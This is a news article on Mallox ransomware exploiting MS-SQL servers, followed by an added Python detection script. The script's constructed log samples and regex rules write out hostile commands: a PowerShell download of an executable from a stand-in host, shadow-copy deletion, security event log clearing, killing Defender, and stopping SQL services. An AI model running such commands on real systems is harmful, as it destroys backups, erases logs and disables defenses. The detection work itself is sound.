Mallox Ransomware Exploits Weak MS-SQL Servers to Breach Networks
Mallox ransomware activity in 2023 has increased by 174% compared with the previous year, according to new findings from Palo Alto Networks Unit 42.
"Mallox ransomware, like many other ransomware threat actors, follows the double extortion trend: stealing data before encrypting an organization's files, and then threatening to publish the stolen data on a leak site as leverage to convince victims to pay the ransom fee," security researchers Lior Rochberger and Shimi Cohen said in a new report shared with The Hacker News.
Mallox is attributed to a threat actor that has also been linked to other ransomware strains, including TargetCompany, Tohnichi, Fargo and, most recently, Xollam.
Once the attackers gain a foothold on a host, they run a PowerShell command that retrieves the ransomware payload from a remote server.
Before it starts encrypting, the binary attempts to stop and remove SQL-related services, delete volume shadow copies, clear system event logs, terminate security-related processes, and bypass Raccine, an open-source tool designed to counter ransomware attacks. Once encryption is complete, a ransom note is dropped in every directory.
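The pre-encryption steps listed above (service tampering, shadow copy deletion, log clearing, killing security tools, a PowerShell download) are the behaviours a detection engineer would alert on, because each of them shows up in process-creation telemetry before any file is encrypted. The script below is an added example written for this page, not code from Unit 42 or from the article: it runs a small set of regex rules over constructed Sysmon-style process records and counts how many distinct precursor behaviours appear on one host. The sample records, rule names and threshold are assumptions; the regexes also cover the `wmic shadowcopy delete` variant, which the article does not mention, so they are slightly broader than the text.

```python
import re
from dataclasses import dataclass


@dataclass
class Finding:
    rule: str        # short rule name (assumed, not from the page)
    technique: str   # MITRE ATT&CK technique the rule maps to
    command: str     # the command line that triggered the rule


# Constructed process-creation records in a Sysmon Event ID 1 style
# ("Image=<path> CommandLine=<cmd>"). These are NOT real Mallox telemetry;
# they are made up to exercise the rules, and include two benign records.
SAMPLE_LOGS = [
    r'Image=C:\Windows\System32\cmd.exe CommandLine=cmd /c dir C:\Users',
    r'Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'CommandLine=powershell.exe -NoProfile -Command "Invoke-WebRequest '
    r'http://example.invalid/p.exe -OutFile C:\Users\Public\p.exe"',
    r'Image=C:\Windows\System32\sc.exe CommandLine=sc stop MSSQLSERVER',
    r'Image=C:\Windows\System32\sc.exe CommandLine=sc delete SQLWriter',
    r'Image=C:\Windows\System32\vssadmin.exe CommandLine=vssadmin delete shadows /all /quiet',
    r'Image=C:\Windows\System32\wevtutil.exe CommandLine=wevtutil cl Security',
    r'Image=C:\Windows\System32\taskkill.exe CommandLine=taskkill /f /im MsMpEng.exe',
    r'Image=C:\Windows\System32\sc.exe CommandLine=sc query wuauserv',
]

# One rule per behaviour the article attributes to the Mallox binary.
# Patterns are illustrative; tune them against your own baseline before use.
RULES = [
    ("powershell_download", "T1059.001 / T1105",
     re.compile(r"powershell.*(Invoke-WebRequest|DownloadString|DownloadFile|\biwr\b)", re.I)),
    ("sql_service_stop_or_delete", "T1489",
     re.compile(r"\b(sc|net)(\.exe)?\s+(stop|delete)\s+\S*sql", re.I)),
    ("shadow_copy_deletion", "T1490",
     re.compile(r"(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)", re.I)),
    ("event_log_clear", "T1070.001",
     re.compile(r"wevtutil(\.exe)?\s+(cl|clear-log)\b", re.I)),
    # MsMpEng.exe is the Defender engine; extend this list with your own EDR
    # process names (assumed list, not from the page).
    ("security_tool_kill", "T1562.001",
     re.compile(r"taskkill(\.exe)?.*\s/im\s+MsMpEng\S*", re.I)),
]


def parse_command_line(record: str) -> str:
    """Pull the CommandLine field out of one flattened record."""
    m = re.search(r"CommandLine=(.*)$", record)
    return m.group(1) if m else ""


def scan(records):
    """Return one Finding per (record, rule) match, in log order."""
    findings = []
    for rec in records:
        cmd = parse_command_line(rec)
        for name, technique, pattern in RULES:
            if pattern.search(cmd):
                findings.append(Finding(name, technique, cmd))
    return findings


def chain_score(findings) -> int:
    """Count distinct precursor behaviours; several on one host in a short
    window is a much stronger signal than any single command."""
    return len({f.rule for f in findings})


def looks_like_ransomware_staging(records, threshold: int = 3) -> bool:
    """Assumed threshold: three distinct precursor behaviours on one host."""
    return chain_score(scan(records)) >= threshold


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"[{f.technique}] {f.rule}: {f.command}")
    print("staging chain detected:", looks_like_ransomware_staging(SAMPLE_LOGS))
```

The point of `chain_score` is that `sc stop` or `wevtutil cl` alone will fire on legitimate administration; correlating several of these behaviours on the same host within a short window, and ordering the alert before the first encryption write, is what turns noisy single-command rules into a useful early warning.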
"The Mallox ransomware group has been more active in the past few months, and their recent recruiting efforts may enable them to attack more organizations if the recruitment drive is successful," the researchers said.
News URL
https://thehackernews.com/2023/07/mallox-ransomware-exploits-weak-ms-sql.html